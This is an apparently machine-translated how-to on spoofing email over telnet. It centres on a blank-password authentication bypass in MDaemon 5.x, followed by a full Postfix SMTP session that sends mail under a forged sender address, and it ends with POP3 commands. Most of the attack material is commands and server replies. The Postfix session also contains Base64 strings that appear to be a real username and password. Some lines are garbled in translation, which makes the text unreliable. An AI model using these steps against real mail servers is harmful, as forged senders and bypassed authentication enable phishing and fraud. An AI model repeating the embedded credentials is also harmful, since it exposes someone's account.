Mail spoofing Mail sample

The vulnerability was early, and the internal network is basically unable to perform such a test.

Use MDaemon 5.x as the target server.

 

 

Directly run the command

 

Telnet ip port 25

Other email servers can be written in this way, but this server cannot.

 

In addition, the md5.x service has a verification vulnerability.

Mdaemon 5.X Verification Vulnerability
Base64 encoding
The password can be blank.

220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 + 0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6 (334 Username :) // username Encoding
TURhZW1vbg = (MDaemon )//
334 UGFzc3dvcmQ6 (334 Password :)//
(Blank password)

235 Authentication successful

 

# Test copying official text

Telnet 192.168.0.1 25 ---------------------------------- use the telnet command to connect to port 25 of the server

Trying 192.168.0.1... ---------------------------------------- connecting to port 25 of the server

Connected to 192.168.0.1. ----------------------------- port 25 of the server is successfully Connected.

220 localhost ESMTP Postfix-by ExtMail ------------ display the server ID (modify the smtpd_banner of main. cf)

Helo test.com ------------------------------------------ identify the user to the server, do not authenticate the mail, skip the following steps to directly send the mail from command

250 localhost

Ehlo test.com -------------------------------------------- ESMTP command, the mail must be authenticated.

250-localhost

250-PIPELINING

250-SIZE 102400000

250-VRFY

250-ETRN

250-AUTH LOGIN PLAIN

250-AUTH = LOGIN PLAIN

250-ENHANCEDSTATUSCODES

250-8BITMIME

250 DSN

Auth login ------------------------------------------------- perform user Identity Authentication

334 VXNlcm5hbWU6

Y29zdGFAYW1heGl0Lm5ldA = ----------------------------------- BASE64 encrypted user name

334 UGFzc3dvcmQ6

MTk4MjIxNA ==------------------------------------------------- BASE64 encrypted password

235 authentication successfully ---------------------------- authentication successful

(535 authentication failed --------------------------------- identity authentication failed)

Mail from: ------------------------------ Mail from address test1@domain.com

250 OK ------------------------------------------------------- Command Execution successful

Rcpt: -------------------------------- Deliver to address test2@domain.com

250 OK ------------------------------------------------------- Command Execution successful

Data --------------------------------------------------------- data transmission Initialization

354 End data with. ------------------------------------------- start data Transmission

Accounts sent to the domain name in the system can skip identity authentication.

# Test copying official text

 

Authentication is not required for personal testing.

 

Correct mail format

From: test1@domain.com

To: test2@domain.com

Date: Mon, 25 Oct 2004 14:24:27 + 0800

Subject: test mail

Hi, test2

This is a test mail, you don't reply it.

Key points, must be fully written, and these need to be handwritten model regular mail format

 

------------------------------------------------------------ Data content, including BASE64 encrypted mail content, ends data transmission with CRLF. CRLF

250 OK: queued as 2F6DE3929 ----------------------------------- Command Execution successful

Quit --------------------------------------------------------- end the session

221 Bye

Connection closed by foreign host. ------------------------- disconnect

 

PS:

Cmd commands for other emails

Mail from: // mail sender
Rcpt to: <Destination Address> // email Receiving address
Data // tell the server that it is part of the email
From: <Destination Address>
Subject: topic
Data: Body content
. End
Check the mail in your own email address on the pop3 server.
Telnet address 110
User // user Name
Pass // Password
Stat // view email status
List
List
Retr // View a specific email (including mail routing information)